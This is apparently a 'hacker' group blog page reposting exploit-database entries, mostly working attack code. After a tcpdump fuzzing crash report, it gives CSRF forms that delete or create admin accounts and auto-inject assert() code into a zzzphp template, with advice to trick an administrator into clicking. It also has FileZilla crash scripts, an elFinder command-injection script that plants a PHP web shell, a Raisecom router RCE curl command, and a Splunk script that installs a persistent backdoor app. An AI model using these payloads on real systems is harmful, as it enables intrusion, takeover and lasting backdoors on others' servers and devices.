Through fuzzing of network capture .pcap files, we have identified 16 crashes with unique stack traces in tcpdump. These crashes are caused by heap-based out-of-bounds memory reads, and can be reproduced with the latest tcpdump source code from GitHub, compiled with AddressSanitizer:
--- cut ---
$ ./tcpdump --version
tcpdump version 4.10.0-PRE-GIT
libpcap version 1.10.0-PRE-GIT (with TPACKET_V3)
OpenSSL 1.1.0h 27 Mar 2018
Compiled with AddressSanitizer/CLang.
--- cut ---
The command line options we used are as follows:
--- cut ---
$ ./tcpdump -e -XX -vvv -R $file
--- cut ---
A summary of each crash with the two top-level callstack items are shown below:
+----------------------------------+-------------------------------------------------------------------------+
| Id | Top of stack trace |
+----------------------------------+-------------------------------------------------------------------------+
| 0c7293c683364afcf4d60f10fa296429 | #0 0x55fdd6 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |
| | #1 0x55f43c in mfr_print tcpdump/./print-fr.c:498:17 |
| 1092c136071deb2f21ddcde498353dfc | #0 0x773fb6 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |
| | #1 0x774b8a in lmp_print_data_link_subobjs tcpdump/./print-lmp.c:411:6 |
| 472984168e31d86fcc3a2cf9b5ac1ddc | #0 0x7c5666 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |
| | #1 0x7e440e in rx_cache_find tcpdump/./print-rx.c:735:27 |
| 55dca8197d3a7e5900df99c60db2821a | #0 0x73b2cb in rpl_printopts tcpdump/./print-icmp6.c:824:27 |
| | #1 0x73af8b in rpl_daoack_print tcpdump/./print-icmp6.c:952:17 |
| 5966513c685d91c5dc5edb42e5191ed4 | #0 0x7b975b in print_attr_vector64 tcpdump/./print-radius.c:1044:4 |
| | #1 0x7b349e in radius_attrs_print tcpdump/./print-radius.c:1199:18 |
| 5ef0457a44194a7e0fb1f1fa9c2d538c | #0 0x744b26 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |
| | #1 0x74ff59 in ikev1_n_print tcpdump/./print-isakmp.c:1766:4 |
| 6535c4a7b0942711db1a5570bf428576 | #0 0x729f56 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |
| | #1 0x72835f in icmp_print tcpdump/./print-icmp.c:573:25 |
| 6d3d893a2bc2d8d50cd9386737f1a3f1 | #0 0x773fb6 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |
| | #1 0x774881 in lmp_print_data_link_subobjs tcpdump/./print-lmp.c:403:13 |
| 7efd0ef3a3602ffba4d429f2beaf8489 | #0 0x5d1486 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |
| | #1 0x5d3ab7 in ospf6_print_lshdr tcpdump/./print-ospf6.c:394:2 |
| 8e933ef7fdb3b248cffd2cc432ddfe0e | #0 0x5d1486 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |
| | #1 0x5d3ab7 in ospf6_print_lshdr tcpdump/./print-ospf6.c:394:2 |
| 9a16cc309f6e8c57587f6cfc19ad15e0 | #0 0x773fb6 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |
| | #1 0x774881 in lmp_print_data_link_subobjs tcpdump/./print-lmp.c:403:13 |
| ab10aa7f73ff686440d2d40a174bf801 | #0 0x651a86 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |
| | #1 0x651264 in vrrp_print tcpdump/./print-vrrp.c:155:5 |
| b388f74a9f892fb85d750dd0e32efce1 | #0 0x60d676 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |
| | #1 0x60ad3a in rsvp_obj_print tcpdump/./print-rsvp.c:1581:17 |
| d203c6b47e3cbdf814ad3769589b3628 | #0 0x4bdf60 in __asan_memcpy (tcpdump/tcpdump+0x4bdf60) |
| | #1 0x682088 in ip6addr_string tcpdump/./addrtoname.c:359:2 |
| ec26a95bd915adce3527d4e8152eea84 | #0 0x7ba077 in EXTRACT_BE_U_8 tcpdump/./extract.h:111:20 |
| | #1 0x7b97f5 in print_attr_vector64 tcpdump/./print-radius.c:1046:17 |
| f7fc9a6bc515585b470f8b9c2d2729d7 | #0 0x651a86 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |
| | #1 0x650f19 in vrrp_print tcpdump/./print-vrrp.c:147:5 |
+----------------------------------+-------------------------------------------------------------------------+
Attached is a ZIP archive containing up to three input samples per each crash, together with the corresponding ASAN logs.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46476.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863591669
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: OOP CMS BLOG 1.0 - Cross-Site Request Forgery (Delete Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: http://zsoft.com.bd/
# Software Link : https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
<html>
<body>
<form method="post" action="http://localhost/[PATH]/admin/userList.php?delUser=34">
<input type="submit" value="Delete">
</form>
</body>
</html>
# Exploit Title: OOP CMS BLOG 1.0 - Cross-Site Request Forgery (Update Site Title and Description)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: http://zsoft.com.bd/
# Software Link : https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
<html>
<body>
<form method="post" action="http://localhost/[PATH]/admin/titleslogan.php" enctype="multipart/form-data">
<table class="form">
<tr>
<td>
<label>Website Title</label>
</td>
<td>
<input type="text" name="title">
</td>
</tr>
<tr>
<td>
<label>Website Slogan</label>
</td>
<td>
<input type="text" name="slogan">
</td>
</tr>
<tr>
<td>
<label>Upload Logo</label>
</td>
<td>
<input type="file" name="logo"/>
</td>
</tr>
<tr>
<td>
</td>
<td>
<input type="submit" name="submit" Value="Update" />
</td>
</tr>
</form>
</body>
</html>
# Exploit Title: OOP CMS BLOG 1.0 - Cross-Site Request Forgery (Add Post)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: http://zsoft.com.bd/
# Software Link : https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
<html>
<body>
<form action="http://localhost/[PATH]/admin/addpost.php" method="post" enctype="multipart/form-data">
<table class="form">
<tr>
<td>
<label>Title</label>
</td>
<td>
<input type="text" name="title" placeholder="Enter Post Title...">
</td>
</tr>
<tr>
<td>
<label>Category</label>
</td>
<td>
<select id="select" name="cat">
<option value="1">Select Category</option>
<option value="19">mr. customer</option>
<option value="2">php</option>
<option value="3">HTML</option>
<option value="4">CSS</option>
<option value="17">c++</option>
<option value="7">java ajax</option>
<option value="20">mr. customer</option>
<option value="18">ajax</option>
</select>
</td>
</tr>
<tr>
<td>
<label>Upload Image</label>
</td>
<td>
<input type="file" name="image"/>
</td>
</tr>
<tr>
<td style="vertical-align: top; padding-top: 9px;">
<label>Content</label>
</td>
<td>
<textarea class="tinymce" name="body"></textarea>
</td>
</tr>
<tr>
<td>
<label>Tags</label>
</td>
<td>
<input type="text" name="tags" placeholder="Enter Tags...">
</td>
</tr>
<tr>
<td>
<label>Authors</label>
</td>
<td>
<input type="text" name="authour" value="admin">
<input type="hidden" name="user_id" value="29">
</td>
</tr>
<tr>
<td>
</td>
<td>
<input type="submit" name="submit" Value="Save" />
</td>
</tr>
</table>
</form>
</body>
</html>
# Note: Many other sections are vulnerable to CSRF, too.
# For example: Delete Post, Add Slider, ...
# Exploit Title: FileZilla 3.40.0 - "Local search" Denial of Service (PoC)
# Discovery by: Mr Winst0n
# Discovery Date: February 20, 2019
# Vendor Homepage: https://filezilla-project.org
# Software Link : https://filezilla-project.org/download.php?type=client&show_all=1
# Tested Version: 3.40.0
# Tested on: Kali linux x86_64
# Vulnerability Type: Denial of Service (DoS)
# Steps to Produce the Crash:
# 1.- Run python code : python filezilla.py
# 2.- Open buff.txt and copy content to clipboard
# 3.- Open Filezilla (located in bin folder), in top bar click on Binoculars icon (search for files recursively)
# 4.- In the opend window, Set Search type to "Local search"
# 5.- Paste ClipBoard on "Search directory" and click on "Search"
# 6.- Boom! Crashed...
#!/usr/bin/env python
buffer = "\x41" * 384
crash = "/" + buffer + "BBBB" + "CCCC"
f = open("buff.txt", "w")
f.write(crash)
f.close()
# Note: If you have not "/" before payload, you should add it to begining of payload, So the program recognizes it as a valid path.
# Exploit Title: FileZilla 3.40.0 - "Local site" Denial of Service (PoC)
# Discovery by: Mr Winst0n
# Discovery Date: February 25, 2019
# Vendor Homepage: https://filezilla-project.org
# Software Link : https://filezilla-project.org/download.php?type=client&show_all=1
# Tested Version: 3.40.0
# Tested on: Kali linux x86_64
# Vulnerability Type: Denial of Service (DoS)
# Steps to Produce the Crash:
# 1.- Run python code : python filezilla-2.py
# 2.- Open crash.txt and copy content to clipboard
# 3.- In "Local site" section paste clipboard and Enter.
# 4.- Boom! Crashed...
#!/usr/bin/env python
buffer = "\x41" * 384
crash = "/" + buffer + "BBBB" + "CCCC"
f = open("crash.txt", "w")
f.write(crash)
f.close()
# Note: If you have not "/" before payload, you should add it to begining of payload, So the program recognizes it as a valid path.
#!/usr/bin/python
'''
# Exploit Title: elFinder <= 2.1.47 - Command Injection vulnerability in the PHP connector.
# Date: 26/02/2019
# Exploit Author: @q3rv0
# Vulnerability reported by: Thomas Chauchefoin
# Google Dork: intitle:"elFinder 2.1.x"
# Vendor Homepage: https://studio-42.github.io/elFinder/
# Software Link: https://github.com/Studio-42/elFinder/archive/2.1.47.tar.gz
# Version: <= 2.1.47
# Tested on: Linux 64bit + Python2.7
# PoC: https://www.secsignal.org/news/cve-2019-9194-triggering-and-exploiting-a-1-day-vulnerability/
# CVE: CVE-2019-9194
# Usage: python exploit.py [URL]
'''
import requests
import json
import sys
payload = 'SecSignal.jpg;echo 3c3f7068702073797374656d28245f4745545b2263225d293b203f3e0a | xxd -r -p > SecSignal.php;echo SecSignal.jpg'
def usage():
if len(sys.argv) != 2:
print "Usage: python exploit.py [URL]"
sys.exit(0)
def upload(url, payload):
files = {'upload[]': (payload, open('SecSignal.jpg', 'rb'))}
data = {"reqid" : "1693222c439f4", "cmd" : "upload", "target" : "l1_Lw", "mtime[]" : "1497726174"}
r = requests.post("%s/php/connector.minimal.php" % url, files=files, data=data)
j = json.loads(r.text)
return j['added'][0]['hash']
def imgRotate(url, hash):
r = requests.get("%s/php/connector.minimal.php?target=%s&width=539&height=960°ree=180&quality=100&bg=&mode=rotate&cmd=resize&reqid=169323550af10c" % (url, hash))
return r.text
def shell(url):
r = requests.get("%s/php/SecSignal.php" % url)
if r.status_code == 200:
print "[+] Pwned! :)"
print "[+] Getting the shell..."
while 1:
try:
input = raw_input("$ ")
r = requests.get("%s/php/SecSignal.php?c=%s" % (url, input))
print r.text
except KeyboardInterrupt:
sys.exit("\nBye kaker!")
else:
print "[*] The site seems not to be vulnerable :("
def main():
usage()
url = sys.argv[1]
print "[*] Uploading the malicious image..."
hash = upload(url, payload)
print "[*] Running the payload..."
imgRotate(url, hash)
shell(url)
if __name__ == "__main__":
main()
# Exploit Title: OOP CMS BLOG 1.0 - SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: http://zsoft.com.bd/
# Software Link : https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
# Multiple files are vulnerable:
# http://localhost/[PATH]/search.php?search=1 [SQLi]&submit=Search
# http://localhost/[PATH]/post.php?id=17 [SQLi]
# http://localhost/[PATH]/posts.php?id=4 [SQLi]
# http://localhost/[PATH]/page.php?pageid=8 [SQLi]
# http://localhost/[PATH]/admin/viewUser.php?userid=34 [SQLi]
# http://localhost/[PATH]/admin/replayMsg.php?msgid=4 [SQLi]
# Note: Above *id values are random.
# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Delete Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
<!doctype html>
<html>
<head>
<title>Delete Admin</title>
</head>
<body>
<form method="post" action="http://localhost/[PATH]/admin/users.php?del=1">
<input type="submit" value="Delete">
</form>
</body>
</html>
# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Edit Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
<!doctype html>
<html>
<head>
<title>Edit Admin</title>
</head>
<body>
<form role="form" action="http://localhost/[PATH]/admin/users.php?source=edit_user&u_id=10" method="POST" enctype="multipart/form-data" >
<!-- You can change u_id value -->
<div class="form-group">
<label for="user_title">User Name</label>
<input type="text" name="user_name" required>
</div><br>
<div class="form-group">
<label for="user_author">FirstName</label>
<input type="text" name="user_firstname" required>
</div><br>
<div class="form-group">
<label for="user_status">LastName</label>
<input type="text" name="user_lastname" required>
</div><br>
<div class="input-group">
<select name="user_role" id="">
<label for="user_role">Role</label>
<option value='User'>Admin</option>
<option value='User'>User</option>
</select>
</div><br>
<div class="form-group">
<label for="post_image">User Image</label>
<input type="file" name="user_image">
</div><br>
<div class="form-group">
<label for="user_tag">Email</label>
<input type="email" name="user_email" class="form-control"required>
</div><br>
<div class="form-group">
<label for="user_tag">Password</label>
<input type="password" name="user_password" required>
</div><br>
<hr>
<button type="submit" name="update_user" value="Update User">Update User</button>
</form>
</body>
</html>
# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: March 1, 2019
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
<html>
<head>
<title>Add Admin</title>
</head>
<body>
<form role="form" action="http://localhost/[PATH]/admin/users.php?source=add_user" method="POST" enctype="multipart/form-data">
<div class="form-group">
<label for="user_title">User Name</label>
<input type="text" name="user_name" required><br><br>
</div>
<div class="form-group">
<label for="user_author">FirstName</label>
<input type="text" name="user_firstname" required><br><br>
</div>
<div class="form-group">
<label for="user_status">LastName</label>
<input type="text" name="user_lastname" required><br><br>
</div>
<div class="form-group">
<label for="user_image">Image</label>
<input type="file" name="user_image" required><br><br>
</div>
<div class="input-group">
<select name="user_role" id="">
<label for="user_role">Role</label>
<option value='Admin'>Admin</option><option value='User'>User</option>
</select><br><br>
</div>
<div class="form-group">
<label for="user_tag">Email</label>
<input type="email" name="user_email" required><br><br>
</div>
<div class="form-group">
<label for="user_tag">Password</label>
<input type="password" name="user_password" required><br><br>
</div>
<button type="submit" name="create_user" value="Add User">Add User</button>
</form>
</body>
</html>
# Exploit Title: Cross-Site Request Forgery(CSRF) of zzzphp cms 1.6.1
# Google Dork: intext:"2015-2019 zzcms.com"
# Date: 26/02/2019
# Exploit Author: Yang Chenglong
# Vendor Homepage: http://www.zzzcms.com/index.html
# Software Link: http://115.29.55.18/zzzphp.zip
# Version: 1.6.1
# Tested on: windows/Linux,iis/apache
# CVE : CVE-2019-9082
Due to the absence of CSRF token in the request, attackers can forge the post request and insert malicious codes into the template file which leads to dynamic code evaluation.
Exploit:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.64/zzzphp/admin015/save.php?act=editfile" method="POST">
<input type="hidden" name="file" value="/zzzphp/template/pc/cn2016/html/search.html" />
<input type="hidden" name="filetext" value="{if:assert($_POST[x])}phpinfo();{end if}" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Save the codes above as html file and host it on a web server. Send the link to the administrator of the website and ask him to click the link(request for exchange friend link or any other possible method), if the person has logged on to the admin panel, it will automatically insert malicious codes in to the template file and leads to dynamic code evaluation.
Remarks: This is a follow up exploit of CVE-2019-9041, whose exploit is here: https://www.exploit-db.com/exploits/46454
# Exploit Title: Remote code execution in Raisecom xpon
# Date: 03/03/2019
# Exploit Author: JameelNabbo
# Website: Ordina.nl
# Vendor Homepage: https://www.raisecom.com
# Software Link: https://www.raisecom.com/products/xpon
# Version: ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
# Tested on: MacOSX
# CVE-2019-7385
POC:
curl -i -s -k -X 'POST' \
-H 'Origin: http://127.0.0.1' -H -H 'Content-Type:
application/x-www-form-urlencoded' -H 'User-Agent: Chrome/7.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/65.0.3325.181 Safari/537.36' -H 'Referer: http://192.168.1.1/password.asp' \
--data-binary
$'userMode=0&oldpass=netstat&newpass=`reboot`&confpass=`reboot`&submit-url=%2Fpassword.asp&save=Apply+Changes&csrf_token=current_cCSRF_ToKEN'
\
'http://192.168.1.1/boaform/formPasswordSetup'
#!/usr/bin/python
# Exploit Title: Splunk Enterprise 7.2.4 Custom App RCE (persistent backdoor - custom binary payload)
# Date: March 1, 2019
# Exploit Author: Matteo Malvica
# Original Author: Lee Mazzoleni
# Vendor Homepage: https://www.splunk.com/
# Software Link: https://www.splunk.com/en_us/download/splunk-enterprise.html
# Version: 7.2.4
# Tested on: kali 4.18.0-kali2-amd64
# CVE : n/a
# NOTES: Due to python interoperability issue on CentOS, I have upgraded the exploit to
# support any kind of binary or payload so the exploit does not have to rely on any python libraries
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from time import sleep
from sys import stdout,argv
from os import getcwd,path,system
from subprocess import Popen
import os
import stat
import binascii
# Download and unpack the correct version for your OS from here: github.com/mozilla/geckodriver/releases
gecko_driver_path = '/root/Desktop/geckodriver'
def checkLogin(url):
if '/login' not in url and '/logout' not in url:
print 'Login successful!'
else:
print 'Login failed! Aborting...'
exit()
def checkUrl(url):
if '_upload' not in url:
print '[-] Navigation error, aborting...'
exit()
def exploit(splunk_target_url, splunk_admin_user, splunk_admin_pass):
print '[+] Starting bot ...'
profile = webdriver.FirefoxProfile()
profile.accept_untrusted_certs = True
driver = webdriver.Firefox(firefox_profile=profile, executable_path=gecko_driver_path)
print '[*] Loading the target page ...'
driver.get(splunk_target_url)
sleep(1)
stdout.write('[*] Attempting to log in with the provided credentials ... ')
username_field = driver.find_element_by_name("username")
username_field.clear()
username_field.send_keys(splunk_admin_user)
sleep(1)
pw_field = driver.find_element_by_name("password")
pw_field.clear()
pw_field.send_keys(splunk_admin_pass)
pw_field.send_keys(Keys.RETURN)
sleep(3)
current_url = driver.current_url
checkLogin(current_url)
url = driver.current_url.split('/')
upload_url = url[0] + '//' + str(url[2]) + '/' + url[3] + '/manager/appinstall/_upload'
print '[*] Navigating to the uploads page ({}) ...'.format(upload_url)
driver.get(upload_url)
sleep(1)
current_url = driver.current_url
checkUrl(current_url)
form = driver.find_element_by_tag_name("form")
input = form.find_element_by_id("appfile")
input.send_keys(getcwd()+'/'+'splunk-shell.tar.gz')
force_update = driver.find_element_by_id("force")
force_update.click()
submit_button = driver.find_element_by_class_name("splButton-primary")
submit_button.click()
print '[*] Your persistent shell has been successfully uploaded!'
print '[*] Be patient, this might take up to a minute...!'
driver.quit()
def generatePayload(shellcode):
# this hex decodes into the evil splunk app (tar.gz file) that we will be uploading as the payload
# after the app is written to disk, together with the provided custom shellcode.
# the app configuration sets it to be enabled upon installation (restarting splunk / manually enabling it is not required.)
# this is a PERSISTENT backdoor, there is no need to re-upload multiple times... the backdoor will reconnect every 10-20 seconds
# CHANGED: the compressed app folder structure is loading a custom binary from inputs.conf
print '[*] Creating Splunk App...'
shell = '1f8b0800e229795c0003ed9c5b6fdbc81580a95c363283b65ea068b7401f06711749dc58e24da4ad34ad9dc44183a6dd20f2260b288a322247126b8a6449cab2374d11f407f4bddbd75efe47db97bef5adfd237def197264eb6ad95959c93ae703a42139c3b99d396766c8e1c4a1d7f577d7e236f3bca27436288a62954a2475cdcc553423730544d50dddd434c3d44ca2a8866ae812299d517e86e8c6098d202b1d9a242c981e0e82359bc7c423ca71e87e438807e55fa817ee57ea952488d83cd380fa300d63bafc556b40fea606f2371543958832cf4c4ce30397bf74f97b57a40b92f44b6a93cf2ae40b22e0d7a425f869f07b003f7ebecf6fe887d85c9e16e5d6cece1371b8dfbf0b793f19d6ffb3d0fe59faaf1a8a628ce87fc9d44aa8ff0b2277b7eba892c4d5392f65ee257972d0bcf88d7141b81ff1f8781c71d8f082069cfdab11ce3dc70882cc1baebb17a586e44a7ea337a8bf9e1b278af29fdc858b972e7f74259f97f3f2b7e45aa51df42a094dbaf15d1a55f9d9639ab41be2782708bcc363da78eab25e7df9bbf7023fa1aecfa2f466d76110e4f933d77782dedda0eb3b7175c0239f5fca2fd5973f79f54a2f29b788baa1bdbe455e59161c435ff1faf552fefb9faa771ebeec1c7cf9eab7af7ff7c7ac14b99c28ce77468af7d551f1f62a91ef057e4b4a8d95744572242635252a75254f4ace6be1478a39520997e15a20d9e0eb0d54c0fffa15f0df7e052cc95797ae7efbead27015d4977f2832fecc7592f60ef3b73db6c7fccfa247346173ab95c19aceaf6c36ff9d166e564de57f70fdc19317dddfffe1ab3ffdf92f7ffddbdfff3152591f8f54d63f87ab63a4a2ce25a260f9abef361b0882bc8770fb4084bb29dc37999b13fe17847b69e09e65e112e16e0af74de6e644b80bc2bd24dcbc7097854b84bb29dc37992b8c564e4c3e7222e59c98a1e4c4038a1c11eee6a98a8c201f0c17336799f7ffdbd3e7ff08829c637297ee57eedf95a6cf74785f4be0f7b27f8334792020c2f2aef813e9282c11eea670df642e0e0410044116cdd0fbbf86eb9fc51a90d3acffb00c85afffb05405d77f2c8221f93bac49bb5e32ef367042f96b9a6a6a4a89cbbf542a6928ff4530247f2fb0e919ac02e37217557352f96b8a89f25f0423f26fc567d001bc85fe2b16eaff4218923f0dc398457b2c9a6f2338bdfc4d552fa1fc17c190fc3b2ca10e4de89c6dc05be8bf85f67f314c967f3a1028f0d379a401f5611ed7ff5b9a35227fcb344c5cffb708aa60f38bae0fa503f90bb71e07ddc86675bbcdecddb8dba9c9d025c46ee0933bc42a68055dee044ee276189cab25a3b4a199d6ba52009d35d761a0a7c8f250acf09fb013c56115f40d5dd7b42c8e9a4c6d9bc53184881875489954c92aa9dd22bdc84d58ff5466fb61102510283e8813d6999dce7a492f6c94544b578ff2da75676710caa7140c553537cca31b3ddaf5a19ea29a1cf47c164160ea745cffa491e99abe7e145948ed5dda62c5b4e2ebcd20aa7743d047169f3873869295eac4f29facff622238270b0019328e5bffafebfab0fe6b60012cd4ff4570522d93ab611484713166bed3a1ae571c57bcbe02f84123700e64796565853c7db8fdacb2b3b5b35d2913be1e0c3ca30ef54817c6993189db41d773488311daf018490262431e20d5b84d23e6903d97f552eb1143fa472727ccf2bbaeda6f0453c6ffbca25d7b4ee3c0d38fff2c433370fcb7088e973f5cf05c1b0e03bf60c7f15ba631c3feeb9aa18dd87fcd3014b4ff8ba0b84aeeb5a9df02ebdb06331c86c40b5a0181110d2b1012b324bdde666eab9d147b7c6d2f81710939801122713b3058b945684c7ad07ab8cbc38614c28029e7c76908b25a940b10f3231ef12b997f3b96c55726861eeedf26e9a534ee325957e04a7aa10183a156c49700974937f26ef4dba4db6915e35d185c1e3eaeceda709d67bcdef0e0b642e8b76e4257b316b110fa13024d2a8bb3fe75226db9cdb1485fcb32d4e04e37f2090cce7891c5fd240c6297eb8debb748d04cbdae55d238c9e3a007d5eb5c1baa6a5e49599ac27ba0ba8aabab72f6d1dd2af9dcb7834e87f999609a81e7053d9e86e7fa2c26377a2ed4fe75c785a8e8c175c23b6d16252e8b6f72994087db4bef4b53e66966d113714399ac75822fd75c9fc7b6067563ef661577e82fbc1a3043dcbdcd2318cb609aef341bbd36ef8e13b69f1c7a9235d21d2c400cfebd805c3f92cb609e89dbe42dedba03a5db85d649862b302bc5485203851a103697f5b599c20eb37833a1a751f296746d50eab11d419573e19324a27e1cc240c54fc65bd75b2708adec240942317911b92e3edc3607bcec03ee05c8877f93a59336ea61e99cbd70e6269d433d5f94740e6dc0bca5236ca1a6f70d5f87462dd75f4b82b0ac1e5ecccca359e2e799d191bb5c3e6d37e68a2df433d56d9fc2bc50981c30bb852c64aab6595afc06eafc1a7a3e423db7e5a7f24e25c54b5a00c1ca6e735254041273fd430372abdf410ce5a10cd5e3b3db503a61f77f0e6374163d8be010e6076d5518353bf082a8bc62e9b45412e679208fa26f80b2beeb1ef27c33fefe87cfeee0608e69cc9aff2b8a3afafcdfd0f0f9df4240f5fab099aaff05756e69bc85fe974cfcfe7f21a0fe7fd84c58ffc3c78c76e01fd7d84fc7acf77fa0fba3fa6feaa8ff0ba12aded2d5e4f4d93ab94398cf1fc63bb25ce52fc5dcb8bee7c62e7f3c7f87a870f1e885975c15efab6af2d80bab34f0bb2e1b329b89eb3fe76c0166e9bf668deabfa55a06eaff22588169f753f16e592d2805455ee93fc8e1137ede0adc56374a5f0190a6eb3150fb31930133ffcc664c59400041b4f5e686696ea84c5159c3341c47b7b566c3b42d4a9beb8a61db25bb411bdac624b3d3a45ecc648f3698c7df36f2a6ba069943fb320726eabfeb3b6c9fc5f3b201b3c6ff9a35f6fe1f0c06eaff2218d3ff0218807be95bf8985012d34e083a983688f471a6b8c05789146479a59a9dd7e49576d0617c671688ef0ef951e5f1a3cf7ff58bfafdbbc52c40d169c82b76e039c704e1de3c58d2a63d96059c142cf38680efbaeace0513f53f5dea31bf11c02cfd57cdd1f9bf5542fd5f0c83fa9fad2c039d166b7c40ab1f3cdc7e747febd1c3adca5a276eb90e686407feb72a243d9557b6bfd879b2756f67ed37a95fffceea8be7b5daeaf35af979fce31b3ffb0978feb4faa25c5bbd5946ad7dbf98d2ff87dd647e0660b6fe5b47fb7f96f8fe9f9665e2febf0b61d2f8ffb0fbf749da122674fcd5d88edc3029178b85f4ab51b6c7cd457f1e00964081b940c2a23dea115591b3f9407210a6c3f9ae8f56e07d61ecfbdf33d8035c39c5fedfd9f7bfa6a9e0fbbfc580fb7f7fd08cebfffcf7003f5eff87f7ff16faaff3ef3f51ff17c284fdbfa54f27079db9ff771a9f88034110044190f71bdcff1b419069e0fedf08727e19d9ff7bdafc1f419073ccccfdbff9f59703c76fa4e98300dcff1b41100441100441100441100441100441100441100441100441100441ce86ff0365f75f'
bytes = shell.decode('hex')
f = open('splunk-shell.tar.gz','wb')
f.write(bytes)
f.close()
if shellcode == "evil":
print "shellcode filename needs to be different - please change it"
exit()
print '\t==> Adding custom shellcode'
# custom shellcode loading
with open(shellcode, "rb") as binaryfile :
evil_bytes = bytearray(binaryfile.read())
f = open('evil','w')
f.write(evil_bytes)
f.close()
st = os.stat('evil')
# making the binary executable
os.chmod('evil', st.st_mode | stat.S_IEXEC)
decompress_cmd = 'tar zxvf splunk-shell.tar.gz &>/dev/null; rm splunk-shell.tar.gz'
p = Popen(decompress_cmd, shell=True, executable='/bin/bash')
p.wait()
move_cmd = 'cp evil splunk-shell/bin/'
p = Popen(move_cmd, shell=True, executable='/bin/bash')
p.wait()
compress_cmd = 'tar zcvf splunk-shell.tar.gz splunk-shell/ &>/dev/null; rm -r splunk-shell/'
p = Popen(compress_cmd, shell=True, executable='/bin/bash')
p.wait()
if path.isfile('splunk-shell.tar.gz'):
print '\t==> Payload Ready! (splunk-shell.tar.gz)'
def showUsage():
print '\n\tScript Usage: {} <targetUrl> <username> <password> <shellcode>'.format(argv[0])
print '\tExample: {} http://192.168.4.16:8000 admin changeme shellcode.bin\n'.format(argv[0])
if len(argv) != 5:
showUsage()
exit()
if not path.isfile(gecko_driver_path):
print '\n\t[!] This program requires geckodriver, download the corresponding version for your OS from the following link:'
print '\t\t==> https://github.com/mozilla/geckodriver/releases'
print '\n\t[!] Extract the geckodriver binary, then add its full path to line 20 of this script.'
print '\t\t==> gecko_driver_path = "/tmp/geckodriver"\n'
exit()
splunk_target_url = argv[1]
splunk_admin_user = argv[2]
splunk_admin_pass = argv[3]
splunk_shellcode = argv[4]
generatePayload(splunk_shellcode)
exploit(splunk_target_url, splunk_admin_user, splunk_admin_pass)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Booked Scheduler v2.7.5 - Remote Command Execution',
'Description' => %q{
This module exploits a file upload vulnerability Booked 2.7.5.
In the "Look and Feel" section of the management panel, you can modify the Logo-Favico-CSS files.
Upload sections has file extension control except favicon part.
You can upload the file with the extension you want through the Favicon field.
The file you upload is written to the main directory of the site under the name "custom-favicon".
